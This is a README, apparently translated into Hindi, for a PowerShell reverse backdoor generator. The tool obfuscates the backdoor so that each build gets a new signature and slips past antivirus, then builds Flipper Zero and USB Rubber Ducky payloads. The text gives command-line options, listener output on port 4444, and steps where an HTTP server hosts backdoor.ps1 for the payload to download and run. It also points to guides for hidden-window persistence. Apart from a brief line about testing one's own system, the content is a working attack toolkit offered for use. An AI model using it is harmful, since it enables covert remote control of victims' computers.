
पावरशेल में लिखा गया रिवर्स बैकडोर जिसे पायथन से अस्पष्ट किया गया है। यह फ्लिपर जीरो और हक5 यूएसबी रबर डकी जैसे लोकप्रिय हैकिंग उपकरणों के लिए पेलोड उत्पन्न करता है, और हर बिल्ड के बाद अपने हस्ताक्षर को बदलता है ताकि एवी से बचने में मदद मिल सके।
/******************************************************************************
रिवर्स बैकडोर टूल जो PowerShell में लिखा गया है और Python के साथ ऑब्स्क्युरेटेड है, जो हर बिल्ड के बाद डिटेक्शन से बचने के लिए एक नया सिग्नेचर प्रदान करता है। इस टूल में Flipper Zero और Hak5 USB Rubber Ducky जैसे लोकप्रिय हैकिंग डिवाइसों के लिए पेलोड बनाने की क्षमता है। अपने सिस्टम की सुरक्षा को उन्नत हमले तकनीकों के खिलाफ परखने के लिए इस टूल का उपयोग करें।
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
वर्तमान कार्यशील निर्देशिका में backdoor.ps1 नामक एक फ़ाइल बनाई जाएगी।
Windows 11, Windows 10 और Kali Linux पर परीक्षण किया गया। इसे छिपी हुई विंडो और स्थायित्व पहुंच के साथ चलाने के लिए गाइड यहाँ देखें
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
इनमें से किसी भी हमले का उपयोग करते समय आप बैकडोर होस्ट करने वाला एक HTTP सर्वर खोलेंगे। बैकडोर प्राप्त होने के बाद HTTP सर्वर बंद हो जाएगा।
नीचे powershell_backdoor.txt नामक एक फ़ाइल उत्पन्न होगी, जो Flipper पर ट्रिगर होने पर आपके कंप्यूटर से HTTP पर बैकडोर लाएगी और निष्पादित करेगी।
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
आपके द्वारा निर्दिष्ट टेक्स्ट फ़ाइल (जैसे: powershell_backdoor.txt) को अपने flipper zero में रखें। जब पेलोड निष्पादित होता है, यह backdoor.ps1 को डाउनलोड करेगा और निष्पादित करेगा।
नीचे Hak5 USB Rubber Ducky के लिए inject.bin फ़ाइल उत्पन्न करने का एक ट्यूटोरियल है।
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
आपकी वर्तमान कार्यशील निर्देशिका में inject.bin नामक एक फ़ाइल रखी जाएगी। इस सुविधा के लिए Java आवश्यक है। जब पेलोड निष्पादित होता है, यह backdoor.ps1 को डाउनलोड करेगा और निष्पादित करेगा।
USB Rubber Ducky हमलों के लिए payload.txt को inject.bin में एनकोड करने के लिए मैंने midnitesnake द्वारा बनाए गए encoder.jar का उपयोग किया है।
नीचे 5 बिल्ड के बाद backdoor.ps1 का sha1 हैश है।
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49